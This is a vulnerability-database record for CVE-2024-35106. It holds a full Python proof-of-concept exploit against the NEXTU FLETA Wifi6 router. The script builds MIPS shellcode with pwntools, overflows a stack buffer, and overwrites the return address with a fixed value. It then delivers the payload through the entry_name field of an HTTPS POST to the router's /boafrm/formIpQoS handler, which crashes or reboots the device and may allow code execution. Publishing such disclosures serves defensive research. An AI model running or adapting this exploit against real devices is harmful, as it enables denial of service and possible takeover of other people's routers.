{"uuid": "8b27e542-2740-435c-9317-55790ef4965b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "title": "NEXTU FLETA Wifi6 Router DOS, Potential RCE POC", "description": "```python\nfrom pwn import *\n\nimport socket\nimport ssl\n\n\ndef shutdown_shell_code():\n    # Target is a 32-bit little-endian MIPS Linux router\n    context.update(arch='mips', os='linux', bits=32, endian='little')\n\n    # execve('/bin/sh', ['autoreboot'], NULL) followed by exit(); argv is kept exactly as in the original PoC\n    cmd = \"/bin/sh\"\n    args = [\"autoreboot\"]\n\n    asmcode = shellcraft.mips.linux.execve(cmd, args, 0) + shellcraft.mips.linux.exit()\n    return asm(asmcode)\n\n\npower_off_code = shutdown_shell_code()\n\n# Padding from the end of the shellcode up to the saved return address\ngap_code = b'A' * 0x138\n\n# This is the area that overwrites the saved return address (RET). Place the address to which you want to redirect the execution flow here, little-endian.\n# For example the address is fixed here as 0x7f854710, i.e. p32(0x7f854710)\nRET_address = b'\\x10\\x47\\x85\\x7f'\nstack_gap = b'C' * 0x40\n\nprint(f\"power_off_code length: {len(power_off_code)}\")\n\nfinal_code = power_off_code + gap_code + RET_address + stack_gap\n\n# Router address and HTTPS port\nHOST = '192.168.1.254'\nPORT = 443\n\n# TLS context for the HTTPS connection; the router presents a self-signed certificate, so hostname and certificate verification are disabled.\n# Named tls_ctx so it does not shadow the pwntools `context` used above.\ntls_ctx = ssl.create_default_context()\ntls_ctx.set_ciphers('HIGH:!DH:!aNULL')\ntls_ctx.check_hostname = False\ntls_ctx.verify_mode = ssl.CERT_NONE\n\nwith socket.create_connection((HOST, PORT)) as sock:\n    with tls_ctx.wrap_socket(sock, server_hostname=HOST) as ssock:\n        # Form parameters required to get past the handler's input checks; the overflow payload goes into the final entry_name field\n        send_byte = (\n            b\"enabled=ON&automaticUplinkSpeed=ON&automaticDownlinkSpeed=ON\"\n            b\"&addressType=0&ipversion=0&protocol=0\"\n            b\"&ipStart=192.168.1.5&ipEnd=192.168.1.5\"\n            b\"&localPortStart=1234&localPortEnd=1234\"\n            b\"&rmt_ipStart=&rmt_ipEnd=&rmt_portStart=&rmt_portEnd=\"\n            b\"&l7_protocol=Disable&mode=1&bandwidth=200&bandwidth_downlink=200\"\n            b\"&remark_dscp=&save_apply=%EC%A0%80%EC%9E%A5+%ED%9B%84+%EC%A0%81%EC%9A%A9\"\n            b\"&addQosFlag=1&lan_mask=255.255.255.0&submit-url=%2Fip_qos.htm\"\n            b\"&entry_name=\" + final_code\n        )\n\n        # POST request headers\n        headers = (\n            b\"POST /boafrm/formIpQoS HTTP/1.1\\r\\n\"\n            b\"Host: \" + HOST.encode('utf-8') + b\"\\r\\n\"\n            b\"Content-Type: application/octet-stream\\r\\n\"\n            b\"Content-Length: \" + str(len(send_byte)).encode('utf-8') + b\"\\r\\n\"\n            b\"Connection: close\\r\\n\\r\\n\"\n        )\n\n        # Send request (headers and body in one write)\n        ssock.sendall(headers + send_byte)\n\n        # Receive response until the router closes the connection (a crashed httpd usually sends nothing)\n        response = b\"\"\n        while True:\n            data = ssock.recv(1024)\n            if not data:\n                break\n            response += data\n\n        # Print response\n        print(response.decode('utf-8', errors='replace'))\n```", "description_format": "markdown", "vulnerability": "CVE-2024-35106", "creation_timestamp": "2025-02-07T03:41:54.937264+00:00", "timestamp": "2025-02-07T03:41:54.937264+00:00", "related_vulnerabilities": [], "meta": [{"ref": ["https://github.com/laskdjlaskdj12/CVE-2024-35106-POC"]}], "author": {"login": "sync_user", "name": "sync_user", "uuid": "4f29edb9-4c4b-44ca-b041-9b050656b6ae"}}
